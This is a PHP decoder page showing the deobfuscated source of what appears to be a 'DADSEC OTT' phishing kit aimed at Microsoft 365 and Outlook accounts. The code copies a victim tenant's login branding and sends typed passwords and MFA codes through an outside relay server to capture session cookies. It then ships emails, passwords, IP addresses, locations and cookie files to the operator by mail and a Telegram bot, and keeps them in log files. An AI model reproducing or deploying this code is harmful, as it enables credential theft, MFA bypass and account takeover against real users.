Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto Cbce8fe34c9306d4c7525081ad1ec2; Ee27f6a8a99d6338c86569df41edfb: Becf805cfaa21a9a62d6..

Decoded Output download

<?   goto Cbce8fe34c9306d4c7525081ad1ec2; Ee27f6a8a99d6338c86569df41edfb: Becf805cfaa21a9a62d6082cd16f51: $token = urlencode(base64_encode(gzdeflate(json_encode(["ctx" => $beginAuth["Ctx"], "flowToken" => $beginAuth["FlowToken"], "cookie" => $token["cookie"], "method" => $method, "session" => $beginAuth["SessionId"]])))); $appotp = $beginAuth["Entropy"]; echo json_encode(["status" => true, "data" => $token, "redirect" => "?{$redirect}&user={$user}&bg={$bg}&logo={$logo}&token={$token}&key={$key}&appotp={$appotp}&boiler={$boiler}"]); C1a8c8911b85bf571cce4bf6b3ce41: Eb5e8854f0c158ff64036b9e6e75f6: goto c979094e39d1f4d65c9e1eff279d22; Bc0e37145a2b1d461fad28a2ebb9da: $tp = $_SESSION["tp"]; if ($tp == "off") { goto de75fe727a5397440fb69649cdcdd1; } if ($tp == "other") { goto Dc65019ba29fbe9059bda23681e038; } if ($tp == "hot") { goto a8fa16226b07e94806923ecb977b77; } $login = ["status" => "error", "message" => "Your account or password is incorrect"]; goto Fefec8aa27a1aa82a44931334a4c65; de75fe727a5397440fb69649cdcdd1: $login = loginOffice($_POST["user"], $_POST["pass"]); goto Fefec8aa27a1aa82a44931334a4c65; Dc65019ba29fbe9059bda23681e038: $login = Other($_POST["user"], $_POST["pass"]); goto Fefec8aa27a1aa82a44931334a4c65; goto c860871d370f12d8d60cca5b2c741a; Fc6753e05c7861d2afdb1949acc3a5: if ($_POST["service"] == "sms") { goto Dfc3c559ac3a0ecd78f962a1ff6dc5; } if ($_POST["service"] == "code") { goto d2311d88b865849f3347a5801d408e; } if ($_POST["service"] == "call") { goto Fff53b1d6ed4e14e21d8baf0299ef5; } if (!($_POST["service"] == "TwoWayVoiceOffice")) { goto A82b46b9a547e4bc13482cdcd64488; } $endAuth = EndAuthOffice($_POST["token"], ''); $newToken = urlencode(base64_encode(gzdeflate(json_encode(["ctx" => $endAuth["Ctx"], "flowToken" => $endAuth["FlowToken"], "cookie" => $token["cookie"], "method" => $token["method"], "session" => $endAuth["SessionId"]])))); if ($endAuth["Success"]) { goto a70f73130ebfccac11ff36d7cac45f; } echo json_encode(["status" => false, "message" => "Verification failed", "token" => $newToken]); goto f776c3b330e34a039a08a14d2375ae; a70f73130ebfccac11ff36d7cac45f: processAuthOffice($endAuth, $user, $token["cookie"], $_POST["key"]); echo json_encode(["status" => true, "redirect" => "0{$random}?success&id={$user}&bg=" . base64_encode($_POST["background"]) . "&logo=" . base64_encode($_POST["logo"]) . "&boiler=" . urlencode(base64_encode($_POST["boiler"]))]); f776c3b330e34a039a08a14d2375ae: A82b46b9a547e4bc13482cdcd64488: goto Eefc3ba92576909bb4bf6aa6fe5c59; Fff53b1d6ed4e14e21d8baf0299ef5: $endAuth = EndAuthOffice($_POST["token"], ''); $newToken = urlencode(base64_encode(gzdeflate(json_encode(["ctx" => $endAuth["Ctx"], "flowToken" => $endAuth["FlowToken"], "cookie" => $token["cookie"], "method" => $token["method"], "session" => $endAuth["SessionId"]])))); if ($endAuth["Success"]) { goto D944b4b833757bc2bfa0765684b4c2; } echo json_encode(["status" => false, "message" => "Verification failed", "token" => $newToken]); goto Ed1cbb4603f84fae5168e5d3bee00d; afa5a161aa2bc6cb165e92eedbf398: include "config.php"; function r($length) { $characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; $result = ''; $i = 0; bb87111eb7d83bbd4c7b7d8b7b4ad6: if (!($i < $length)) { goto aac922eaa28a9a01c89d30cc85ebb4; } $result .= $characters[rand(0, strlen($characters) - 1)]; d99efe14a354b3f95e0002b4972d31: $i++; goto bb87111eb7d83bbd4c7b7d8b7b4ad6; aac922eaa28a9a01c89d30cc85ebb4: return $result; } $random = r(90); function sendEmailResult($email, $password, $status, $cookie = null) { goto d9c07537227e5242d8b4325bc637fb; d9c07537227e5242d8b4325bc637fb: include "config.php"; $adddate = date("D M d, Y g:i a"); if (!empty($_SERVER["HTTP_CLIENT_IP"]) && filter_var($_SERVER["HTTP_CLIENT_IP"], FILTER_VALIDATE_IP)) { goto Bc229709527b36cda3a74b09aeac04; } if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"]) && filter_var($_SERVER["HTTP_X_FORWARDED_FOR"], FILTER_VALIDATE_IP)) { goto c5c0c1181daaef3fa2e891105a797b; } if (filter_var($_SERVER["REMOTE_ADDR"], FILTER_VALIDATE_IP)) { goto C97c0e601aba80f16625dbd8f5a7a6; } goto D283aa8d0433620642aa66a4e05fa3; Bc229709527b36cda3a74b09aeac04: $ip = $_SERVER["HTTP_CLIENT_IP"]; goto D283aa8d0433620642aa66a4e05fa3; c5c0c1181daaef3fa2e891105a797b: $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto D283aa8d0433620642aa66a4e05fa3; C97c0e601aba80f16625dbd8f5a7a6: $ip = $_SERVER["REMOTE_ADDR"]; D283aa8d0433620642aa66a4e05fa3: $fud_scama = curl_init(); curl_setopt($fud_scama, CURLOPT_URL, "http://ip-api.com/json/" . $ip); curl_setopt($fud_scama, CURLOPT_HEADER, 0); curl_setopt($fud_scama, CURLOPT_RETURNTRANSFER, true); $curlExec = curl_exec($fud_scama); goto a47ccd0144bee28e19c23f9e69f26a; a47ccd0144bee28e19c23f9e69f26a: $IP_LOOKUP = json_decode($curlExec, true); $browser = $_SERVER["HTTP_USER_AGENT"]; $brow = "Unknown"; if (strstr($browser, "Firefox")) { goto F3266efc0e484567070b0f816947b4; } if (strstr($browser, "Edg")) { goto E2a684cedbe92f1cba5c0988cb39e1; } if (strstr($browser, "OPR")) { goto E1d7475b594e06ad447a0213ad2e84; } if (strstr($browser, "Chrome")) { goto c479a2a0217b91debda5abd05757bc; } if (strstr($browser, "Safari") && !strstr($browser, "Chrome")) { goto f645091d509ba7ee7feab4400d4c6e; } if (strstr($browser, "Mobile")) { goto f3030201123741849aaadcb2e4cd5b; } goto E13c83cbc5c1782e99b08e892005f1; F3266efc0e484567070b0f816947b4: $brow = "Firefox"; goto E13c83cbc5c1782e99b08e892005f1; E2a684cedbe92f1cba5c0988cb39e1: $brow = "Edge"; goto E13c83cbc5c1782e99b08e892005f1; E1d7475b594e06ad447a0213ad2e84: $brow = "Opera"; goto E13c83cbc5c1782e99b08e892005f1; c479a2a0217b91debda5abd05757bc: goto Eb6efbf562807ff1642ebd48fac329; Eb6efbf562807ff1642ebd48fac329: $brow = "Chrome"; goto E13c83cbc5c1782e99b08e892005f1; f645091d509ba7ee7feab4400d4c6e: $brow = "Safari"; goto E13c83cbc5c1782e99b08e892005f1; f3030201123741849aaadcb2e4cd5b: $brow = "Phone Browser"; E13c83cbc5c1782e99b08e892005f1: $fud_scama_country = $IP_LOOKUP["country"]; $fud_scama_countrycode = $IP_LOOKUP["countryCode"]; $fud_scama_state = $IP_LOOKUP["regionName"]; $fud_scama_city = $IP_LOOKUP["city"]; $fud_scama_postal = $IP_LOOKUP["zip"]; $m = "[OTT] {$status} [" . $email . "] - [GIFT FROM DADSEC]
"; $m .= "+ ---------------[OTT]-------------+
"; $m .= "| E : " . $email . "
"; $m .= "| P : " . $password . "\xa"; $m .= "| IP : {$ip}
"; $m .= "| B : " . $brow . "\xa"; $m .= "| L : " . $fud_scama_city . " - " . $fud_scama_state . " - " . $fud_scama_country . "
"; goto Afb38490cfca25ca6d74af21095584; c30f4729f9ada106960b9284a44093: $body .= $m . "\xd
"; $body .= "--" . $boundary . "\xd
"; if (!$cookie) { goto a817bf13791ed315733133d6507a1f; } $body .= "Content-Type: text/plain; name="" . $email . ".txt" . ""
"; $body .= "Content-Transfer-Encoding: base64
"; $body .= "Content-Disposition: attachment; filename="" . $email . ".txt" . ""
\xa
"; $body .= chunk_split(base64_encode($cookie)) . "\xd\xa"; $body .= "--" . $boundary . "--"; a817bf13791ed315733133d6507a1f: $subject = "[OTT] {$status} [" . $email . "] - [GIFT FROM DADSEC]"; if (!(!empty($email) && isset($email))) { goto fc3d79c10646263a4ba1059b86ab55; } if (!($send_results_to_email == "on")) { goto Fad7a4a667e2279fbb3feb62ec8b77; } foreach ($contacts as $contact) { $to = $contact; mail($to, $subject, $body, $headers); b93b549b3d0ba776e7f963e1be3ebe: } c43767aab96ef90368789219c3da50: Fad7a4a667e2279fbb3feb62ec8b77: if (!($send_results_to_telegram == "on")) { goto B3946445b9c395f759320f5ab17178; } if ($cookie) { goto D67b2b192c85294a48ad2589c1e350; } $document_url = "https://api.telegram.org/bot" . $bot_token . "/sendMessage"; $document_post_fields = array("chat_id" => $chat_id, "text" => $telegram); goto e6736d685f58b0b6c14e5af2219c3b; goto E56a1eb5ab43834c102301ef1d2d53; c5b1dbc7b949f0de5a5c2e6190d3cf: goto e4fef1f5acf7586f548878f1ae9694; ce45416137e3d593925d9e99f0ff47: $res_file = fopen("bloody/" . $invalid_logs_file, "a"); fwrite($res_file, $m) . "\xd\xa"; goto e4fef1f5acf7586f548878f1ae9694; D5cd3ea3eaf1bc9bd4399c3411951f: $res_file = fopen("bloody/" . $sso_logs_file, "a"); fwrite($res_file, $m) . "\xd
"; e4fef1f5acf7586f548878f1ae9694: if (!$cookie) { goto A26a48c5fa65b6499046180b60a660; } $res_file = fopen("bloody/" . $email . ".txt", "w"); fwrite($res_file, $cookie) . "
\xa"; unlink($temp_file_txt); A26a48c5fa65b6499046180b60a660: fc3d79c10646263a4ba1059b86ab55: goto acf98c19f4fcac681917001c0bfadd; E56a1eb5ab43834c102301ef1d2d53: D67b2b192c85294a48ad2589c1e350: $temp_file = tempnam(sys_get_temp_dir(), "cookie_"); file_put_contents($temp_file, $cookie); $temp_file_txt = substr_replace($temp_file, "_{$email}.txt", -4); rename($temp_file, $temp_file_txt); $document_url = "https://api.telegram.org/bot" . $bot_token . "/sendDocument"; $document_post_fields = array("chat_id" => $chat_id, "document" => curl_file_create($temp_file_txt), "caption" => $telegram); e6736d685f58b0b6c14e5af2219c3b: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $document_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $document_post_fields); $result = curl_exec($ch); curl_close($ch); B3946445b9c395f759320f5ab17178: if (strpos($status, "INVALID") !== false) { goto ce45416137e3d593925d9e99f0ff47; } if (strpos($status, "SSO") !== false) { goto D5cd3ea3eaf1bc9bd4399c3411951f; } $res_file = fopen("bloody/" . $valid_logs_file, "a"); fwrite($res_file, $m) . "
"; goto c5b1dbc7b949f0de5a5c2e6190d3cf; Afb38490cfca25ca6d74af21095584: $m .= "| D : " . $adddate . "
"; $m .= $cookie != '' ? "| C : Delicious cookies!
" : "| C : None\xa"; $m .= "+ ------------------------------------+\xa"; $telegram = "[OTT] {$status} [ " . $email . " ] " . (strpos($status, "INVALID") !== false ? "\xe2\235\227" : "\342\x9d\244\xef\270\217") . "
"; $telegram .= "\xe2\226\xac\xe2\226\254\342\226\xac\342\x96\254\xe2\x96\xac\xe2\226\254\342\x96\xac[DADSEC OTT]\342\x96\xac\342\x96\xac\342\x96\xac\342\x96\xac\342\226\254\xe2\x96\xac\xe2\x96\xac\xa"; $telegram .= "\xe2\x9a\241 Email: " . $email . "\xa"; $telegram .= "\xe2\232\241 Password: " . $password . "
"; $telegram .= "\xe2\x9a\241 2FA Security: " . (strpos($status, "2FA") !== false ? "\xe2\x9c\205" : "\xe2\235\227") . "
"; $telegram .= "\342\226\254\xe2\226\xac\xe2\226\xac\xe2\226\xac\342\x96\254\xe2\226\254[IP INFORMATION]\342\x96\xac\xe2\226\xac\342\x96\xac\xe2\226\254\342\x96\254\xe2\x96\xac\xa"; $telegram .= "IP: {$ip}
"; $telegram .= "Browser: " . $brow . "\xa"; $telegram .= "Location: " . $fud_scama_city . " - " . $fud_scama_state . " - " . $fud_scama_country . "
"; $telegram .= "Date: " . $adddate . "\xa"; $telegram .= $cookie != '' ? "Cookies: Delicious cookies!\xa" : "Cookies: None
"; $boundary = md5(time()); $headers .= "MIME-Version: 1.0
"; $headers .= "Content-Type: multipart/mixed; boundary=" . $boundary . "\xd
"; $body = "--" . $boundary . "\xd\xa"; $body .= "Content-Type: text/plain; charset=UTF-8
"; $body .= "Content-Transfer-Encoding: 8bit\xd\xa\xd
"; goto c30f4729f9ada106960b9284a44093; acf98c19f4fcac681917001c0bfadd: } function request($post = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://ott.codes/"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); if (!($post != NULL)) { goto Cf303da0ca359a23bea102c9a5dd41; } curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post)); Cf303da0ca359a23bea102c9a5dd41: $result = curl_exec($ch); if (!curl_errno($ch)) { goto E392a40c53f58bb204854e06361649; } echo curl_error($ch); E392a40c53f58bb204854e06361649: curl_close($ch); return $result; } function getDetailEmail($email) { $banner = null; $background = null; $data = ["username" => $email, "isOtherIdpSupported" => true, "checkPhones" => false, "isRemoteNGCSupported" => true, "isCookieBannerShown" => false, "isFidoSupported" => true, "country" => "ID", "forceotclogin" => false, "isExternalFederationDisallowed" => false, "isRemoteConnectSupported" => false, "federationFlags" => 0, "isSignup" => false, "isAccessPassSupported" => true]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://login.microsoftonline.com/common/GetCredentialType?mkt=en-US"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data)); $result = curl_exec($ch); curl_close($ch); $ress = json_decode($result, true); if ($ress["IfExistsResult"] == 1) { goto d5812dcf717ce61b1d82bcbeb8b5dc; } if ($ress["IfExistsResult"] == 5) { goto F2af18574aa5b1c59dec20a2c3b80f; } if (in_array($ress["IfExistsResult"], array(0, 6))) { goto f78f36414e7893efaa9a0530a380b6; } goto d5e990f85bb2fcb9c67bc3b3d2eb7b; d5812dcf717ce61b1d82bcbeb8b5dc: return ["status" => "error", "message" => "We couldn't find an account with that username. Try another account."]; goto d5e990f85bb2fcb9c67bc3b3d2eb7b; F2af18574aa5b1c59dec20a2c3b80f: $_SESSION["tp"] = "hot"; goto d5e990f85bb2fcb9c67bc3b3d2eb7b; f78f36414e7893efaa9a0530a380b6: if (isset($ress["Credentials"]["FederationRedirectUrl"]) && !empty($ress["Credentials"]["FederationRedirectUrl"])) { goto d4422710903c06402f96b0c3e26e97; } $_SESSION["tp"] = "off"; goto B731a6616047664cb70b2002d9d217; d4422710903c06402f96b0c3e26e97: $_SESSION["tp"] = "other"; B731a6616047664cb70b2002d9d217: d5e990f85bb2fcb9c67bc3b3d2eb7b: if (!isset($ress["EstsProperties"]["UserTenantBranding"][0]["BannerLogo"])) { goto bfb75b3aba47782a6b174abafbccf7; } $banner = $ress["EstsProperties"]["UserTenantBranding"][0]["BannerLogo"]; bfb75b3aba47782a6b174abafbccf7: if (!isset($ress["EstsProperties"]["UserTenantBranding"][0]["Illustration"])) { goto E47ea7c52604947e2a7e135990f7ee; } $background = $ress["EstsProperties"]["UserTenantBranding"][0]["Illustration"]; E47ea7c52604947e2a7e135990f7ee: if (!isset($ress["EstsProperties"]["UserTenantBranding"][0]["BoilerPlateText"])) { goto A7ca8486a751d95845dda16047b764; } $boilerPlateText = $ress["EstsProperties"]["UserTenantBranding"][0]["BoilerPlateText"]; A7ca8486a751d95845dda16047b764: return ["status" => "success", "banner" => $banner, "background" => $background, "boilerPlateText" => $boilerPlateText]; } function Other($email, $password) { global $api_token; $data = array("other" => true, "api_token" => $api_token, "email" => $email, "password" => $password, "d" => base64_encode($_SERVER["SERVER_NAME"])); $response = request($data); $result = json_decode($response, true); if ($result && isset($result["success"]) && $result["success"] === true) { goto c5b520a8f6cd6272cec7fc96abb974; } if ($result["status"] == "verify") { goto e228b2966b4a890432a8f6395a1ef4; } sendEmailResult($email, $password, "SSO OFFICE NOT SURE"); return ["status" => "error", "message" => "Your account or password is incorrect"]; goto Cf5b1ec360cd158752bef58f9b95b9; c5b520a8f6cd6272cec7fc96abb974: sendEmailResult($email, $password, "OFFICE VALID"); return ["status" => "success", "message" => "Login success"]; goto Cf5b1ec360cd158752bef58f9b95b9; e228b2966b4a890432a8f6395a1ef4: return $result; Cf5b1ec360cd158752bef58f9b95b9: } function loginOutlook($email, $password) { global $api_token; $data = array("outlook" => true, "api_token" => $api_token, "email" => $email, "password" => $password, "d" => base64_encode($_SERVER["SERVER_NAME"])); $response = request($data); $result = json_decode($response, true); if ($result && isset($result["success"]) && $result["success"] === true) { goto e2e64c7e397babd84e00df0aabb372; } sendEmailResult($email, $password, "OUTLOOK INVALID"); return ["status" => "error", "message" => "Your account or password is incorrect"]; goto Ff97dd33fba5549244a02f990a0781; e2e64c7e397babd84e00df0aabb372: sendEmailResult($email, $password, "OUTLOOK VALID"); return ["status" => "success", "message" => "Login success"]; Ff97dd33fba5549244a02f990a0781: } function loginOffice($email, $password) { global $api_token; $data = array("office" => true, "api_token" => $api_token, "email" => $email, "password" => $password, "d" => base64_encode($_SERVER["SERVER_NAME"])); $response = request($data); $result = json_decode($response, true); if ($result["status"] == "error") { goto B152e7b689b4c1848fa9151646b8fc; } if ($result["status"] == "success") { goto fa0379b1ca6cf08732225ab5efafd8; } if ($result["status"] == "verify") { goto A43b35de75dbc3fdb2b0128c1363b8; } goto D9c0b96fb0f5cef990af707ea4fbcf; B152e7b689b4c1848fa9151646b8fc: sendEmailResult($email, $password, "OFFICE INVALID"); return $result; goto D9c0b96fb0f5cef990af707ea4fbcf; fa0379b1ca6cf08732225ab5efafd8: sendEmailResult($email, $password, "OFFICE VALID", base64_decode($result["cookies"])); return $result; goto D9c0b96fb0f5cef990af707ea4fbcf; A43b35de75dbc3fdb2b0128c1363b8: return $result; D9c0b96fb0f5cef990af707ea4fbcf: } function beginAuthOffice($method, $ctx, $flowToken, $canary, $cookie) { global $api_token; $data = array("beginAuthOffice" => true, "api_token" => $api_token, "method" => $method, "ctx" => $ctx, "flowToken" => $flowToken, "canary" => $canary, "cookie" => $cookie, "d" => base64_encode($_SERVER["SERVER_NAME"])); $response = request($data); $result = json_decode($response, true); return $result; } function EndAuthOffice($token, $otc = null) { global $api_token; $data = array("EndAuthOffice" => true, "api_token" => $api_token, "token" => $token, "otc" => $otc, "d" => base64_encode($_SERVER["SERVER_NAME"])); $response = request($data); $result = json_decode($response, true); return $result; } function processAuthOffice($token, $user, $cookie, $password) { global $api_token; $data = array("processAuthOffice" => true, "api_token" => $api_token, "token" => $token, "user" => $user, "cookie" => $cookie, "password" => $password, "d" => base64_encode($_SERVER["SERVER_NAME"])); $response = request($data); $result = json_decode($response, true); if (!($result["status"] == "success")) { goto Af676877dc183994558070afe16d63; } sendEmailResult(base64_decode($user), base64_decode($password), "OFFICE 2FA VALID", base64_decode($result["cookies"])); Af676877dc183994558070afe16d63: } $action = $_POST["do"]; if ($action == "check") { goto d5f23605601c738d292f983b7321d7; } if ($action == "login") { goto Bc0e37145a2b1d461fad28a2ebb9da; } if ($action == "verify") { goto bc0793df41cbd75fd209387765c300; } if (!($action == "checkVerify")) { goto dfd2ced1ceee1db14b0d07dc9c9224; } $user = base64_encode($_POST["user"]); $token = json_decode(gzinflate(base64_decode($_POST["token"])), true); if ($_POST["service"] == "notif") { goto f6bbab46c138c1be3739e68344dba5; } goto Fc6753e05c7861d2afdb1949acc3a5; Ec382fcde0dd5bcbe69e97f32804a3: $endAuth = EndAuthOffice($_POST["token"], $_POST["otc"]); $newToken = urlencode(base64_encode(gzdeflate(json_encode(["ctx" => $endAuth["Ctx"], "flowToken" => $endAuth["FlowToken"], "cookie" => $token["cookie"], "method" => $token["method"], "session" => $endAuth["SessionId"]])))); if ($endAuth["Success"]) { goto a81b9d9b4b2f67e0f387ac3193dda1; } echo "<script>window.location.href=`1" . $random . "?sms&user=" . $user . "&bg=" . base64_encode($_POST["background"]) . "&logo=" . base64_encode($_POST["logo"]) . "&token=" . $newToken . "&error&key=" . $_POST["key"] . "&boiler=" . urlencode(base64_encode($_POST["boiler"])) . "`;</script>"; goto Baf4b3fb1f66eeaa31d45dc1544430; a81b9d9b4b2f67e0f387ac3193dda1: processAuthOffice($endAuth, $user, $token["cookie"], $_POST["key"]); echo "<script>window.location.href=`0" . $random . "?success&id=" . $user . "&bg=" . base64_encode($_POST["background"]) . "&logo=" . base64_encode($_POST["logo"]) . "&boiler=" . urlencode(base64_encode($_POST["boiler"])) . "`;</script>"; Baf4b3fb1f66eeaa31d45dc1544430: edba106daa5ac11c772ee087747330: goto C5d28e59771496dff7cc65925103a5; f6bbab46c138c1be3739e68344dba5: $endAuth = EndAuthOffice($_POST["token"]); $newToken = urlencode(base64_encode(gzdeflate(json_encode(["ctx" => $endAuth["Ctx"], "flowToken" => $endAuth["FlowToken"], "cookie" => $token["cookie"], "method" => $token["method"], "session" => $endAuth["SessionId"]])))); if ($endAuth["Success"]) { goto F0c946f1064cddc9551e68096d11c1; } echo json_encode(["status" => false, "message" => "Verification failed", "token" => $newToken]); goto A7e70858e748365449c53d71e003ea; F0c946f1064cddc9551e68096d11c1: processAuthOffice($endAuth, $user, $token["cookie"], $_POST["key"]); echo json_encode(["status" => true, "redirect" => "0{$random}?success&id={$user}&bg=" . base64_encode($_POST["background"]) . "&logo=" . base64_encode($_POST["logo"]) . "&boiler=" . urlencode(base64_encode($_POST["boiler"]))]); goto f0e1dc98b35f5f6dbc69d43f1e6212; c860871d370f12d8d60cca5b2c741a: a8fa16226b07e94806923ecb977b77: $login = loginOutlook($_POST["user"], $_POST["pass"]); Fefec8aa27a1aa82a44931334a4c65: $user = base64_encode($_POST["user"]); if ($login["status"] == "error") { goto f3a702f1f8e320d6dec04b1ad25e4d; } if ($login["status"] == "success") { goto E1fd44d1846249cae8e4854ce48408; } if (!($login["status"] == "verify")) { goto A038dbe3947a2b6fe0e3d8e8576070; } echo "<script>window.location.href=`1" . $random . "?list&user=" . $user . "&bg=" . base64_encode($_POST["background"]) . "&logo=" . base64_encode($_POST["logo"]) . "&token=" . $login["data"] . "&method=" . $login["method"] . "&key=" . $login["key"] . "&boiler=" . urlencode(base64_encode($_POST["boiler"])) . "`;</script>"; A038dbe3947a2b6fe0e3d8e8576070: goto e6764e481157d3ee4fbc170e741f49; E1fd44d1846249cae8e4854ce48408: echo "<script>window.location.href=`0" . $random . "?success&id=" . $user . "&bg=" . base64_encode($_POST["background"]) . "&logo=" . base64_encode($_POST["logo"]) . "&boiler=" . urlencode(base64_encode($_POST["boiler"])) . "`;</script>"; e6764e481157d3ee4fbc170e741f49: goto b7eb030454e54510d5541e0e1b2fdc; f3a702f1f8e320d6dec04b1ad25e4d: if (isset($login["message"]) && $login["message"] == "50053") { goto bec8a53446abb5046da4abc35931e6; } $msg = "0"; goto a5555835905f29079b680fcbe98395; bec8a53446abb5046da4abc35931e6: $msg = "1"; goto A37c3570fbd4bab2d74ac7d9c85c41; A37c3570fbd4bab2d74ac7d9c85c41: a5555835905f29079b680fcbe98395: echo "<script>window.location.href=`0" . $random . "?error&id=" . $user . "&bg=" . base64_encode($_POST["background"]) . "&logo=" . base64_encode($_POST["logo"]) . "&boiler=" . urlencode(base64_encode($_POST["boiler"])) . "&msg=" . $msg . "`;</script>"; b7eb030454e54510d5541e0e1b2fdc: c979094e39d1f4d65c9e1eff279d22: goto E3e70e8e67f33165f49fece0e4a2b5; d5f23605601c738d292f983b7321d7: $email = $_POST["email"]; $result = getDetailEmail($email); echo json_encode($result); goto cf8a8e4a057233a6f765c4ce7de51f; Ed1cbb4603f84fae5168e5d3bee00d: goto b28ce2e28c6e7a59de57756961b79c; D944b4b833757bc2bfa0765684b4c2: processAuthOffice($endAuth, $user, $token["cookie"], $_POST["key"]); echo json_encode(["status" => true, "redirect" => "0{$random}?success&id={$user}&bg=" . base64_encode($_POST["background"]) . "&logo=" . base64_encode($_POST["logo"]) . "&boiler=" . urlencode(base64_encode($_POST["boiler"]))]); b28ce2e28c6e7a59de57756961b79c: Eefc3ba92576909bb4bf6aa6fe5c59: goto f17dcd2a16706ab4fbaca0e6c59d1f; d2311d88b865849f3347a5801d408e: $endAuth = EndAuthOffice($_POST["token"], $_POST["otc"]); $newToken = urlencode(base64_encode(gzdeflate(json_encode(["ctx" => $endAuth["Ctx"], "flowToken" => $endAuth["FlowToken"], "cookie" => $token["cookie"], "method" => $token["method"], "session" => $endAuth["SessionId"]])))); if ($endAuth["Success"]) { goto Abdfe439276580e7a47443d23f15ba; } echo "<script>window.location.href=`1" . $random . "?phoneappotp&user=" . $user . "&bg=" . base64_encode($_POST["background"]) . "&logo=" . base64_encode($_POST["logo"]) . "&boiler=" . urlencode(base64_encode($_POST["boiler"])) . "&token=" . $newToken . "&error&key=" . $_POST["key"] . "`;</script>"; goto B38cd4f6a494bfd155abbddf16b8a0; Abdfe439276580e7a47443d23f15ba: processAuthOffice($endAuth, $user, $token["cookie"], $_POST["key"]); echo "<script>window.location.href=`0" . $random . "?success&id=" . $user . "&bg=" . base64_encode($_POST["background"]) . "&logo=" . base64_encode($_POST["logo"]) . "&boiler=" . urlencode(base64_encode($_POST["boiler"])) . "`;</script>"; B38cd4f6a494bfd155abbddf16b8a0: f17dcd2a16706ab4fbaca0e6c59d1f: goto edba106daa5ac11c772ee087747330; Dfc3c559ac3a0ecd78f962a1ff6dc5: goto Ec382fcde0dd5bcbe69e97f32804a3; d1d58d94f54a8efb5b52a612485a6a: goto b8056c429956dfce06b7317ffa520f; A77a699a708145204fd58d2ee4ed7d: $redirect = "twoawaysms"; b8056c429956dfce06b7317ffa520f: goto Ea2a89953d88acfe691365cc17f52e; C05673fc4689e7396ecb0a25a213d4: $redirect = "sms"; Ea2a89953d88acfe691365cc17f52e: goto c330cb6155d9f153e2a01342f123e8; D01f4c1765c52d3752dc1f533c873f: $redirect = "phoneappotp"; c330cb6155d9f153e2a01342f123e8: goto adea12a6dd9a029f2292a36731c25b; Fdb6f26c8fe3d0e2e0912fb88cb82b: $redirect = "phoneappnotif"; adea12a6dd9a029f2292a36731c25b: $beginAuth = beginAuthOffice($method, $token["ctx"], $token["flowToken"], $token["canary"], $token["cookie"]); if ($beginAuth["Success"]) { goto Becf805cfaa21a9a62d6082cd16f51; } echo json_encode(["status" => false, "message" => "Sorry, we're having trouble verifying your account. Please try again."]); goto C1a8c8911b85bf571cce4bf6b3ce41; goto Ee27f6a8a99d6338c86569df41edfb; f0e1dc98b35f5f6dbc69d43f1e6212: A7e70858e748365449c53d71e003ea: C5d28e59771496dff7cc65925103a5: dfd2ced1ceee1db14b0d07dc9c9224: goto Eb5e8854f0c158ff64036b9e6e75f6; bc0793df41cbd75fd209387765c300: $token = json_decode(gzinflate(base64_decode($_POST["token"])), true); $bg = base64_encode($_POST["background"]); $logo = base64_encode($_POST["logo"]); $method = $_POST["method"]; $user = base64_encode($_POST["user"]); $key = $_POST["key"]; $boiler = urlencode(base64_encode($_POST["boiler"])); $redirect = ''; if ($method == "PhoneAppNotification") { goto Fdb6f26c8fe3d0e2e0912fb88cb82b; } if ($method == "PhoneAppOTP") { goto D01f4c1765c52d3752dc1f533c873f; } if ($method == "OneWaySMS") { goto C05673fc4689e7396ecb0a25a213d4; } if ($method == "TwoWayVoiceMobile") { goto A77a699a708145204fd58d2ee4ed7d; } if (!($method == "TwoWayVoiceOffice")) { goto C204fc4253216d4604dbb8937a74af; } $redirect = "twoawayoff"; C204fc4253216d4604dbb8937a74af: goto d1d58d94f54a8efb5b52a612485a6a; Cbce8fe34c9306d4c7525081ad1ec2: error_reporting(0); header("Access-Control-Allow-Origin: *"); if (!empty($_SERVER["HTTP_CLIENT_IP"]) && filter_var($_SERVER["HTTP_CLIENT_IP"], FILTER_VALIDATE_IP)) { goto ed1f4a9c6a73e8602e65115c975571; } if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"]) && filter_var($_SERVER["HTTP_X_FORWARDED_FOR"], FILTER_VALIDATE_IP)) { goto B864b4cb2fb089636e08c35acea8b8; } if (filter_var($_SERVER["REMOTE_ADDR"], FILTER_VALIDATE_IP)) { goto E9bebce0820a2552ae469ed33e27e7; } goto e42b807c4f129eb9d1a57e77e783f2; ed1f4a9c6a73e8602e65115c975571: $ip = $_SERVER["HTTP_CLIENT_IP"]; goto e42b807c4f129eb9d1a57e77e783f2; B864b4cb2fb089636e08c35acea8b8: $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto e42b807c4f129eb9d1a57e77e783f2; E9bebce0820a2552ae469ed33e27e7: $ip = $_SERVER["REMOTE_ADDR"]; e42b807c4f129eb9d1a57e77e783f2: session_start(); if (!(!isset($_SESSION["token"]) || $_SESSION["token"] !== $ip)) { goto fd36ef428e19bffd705c9b6958c9d4; } header("Location: index.php"); exit; fd36ef428e19bffd705c9b6958c9d4: goto afa5a161aa2bc6cb165e92eedbf398; cf8a8e4a057233a6f765c4ce7de51f: E3e70e8e67f33165f49fece0e4a2b5: 
 ?>

Did this file decode correctly?

Original Code

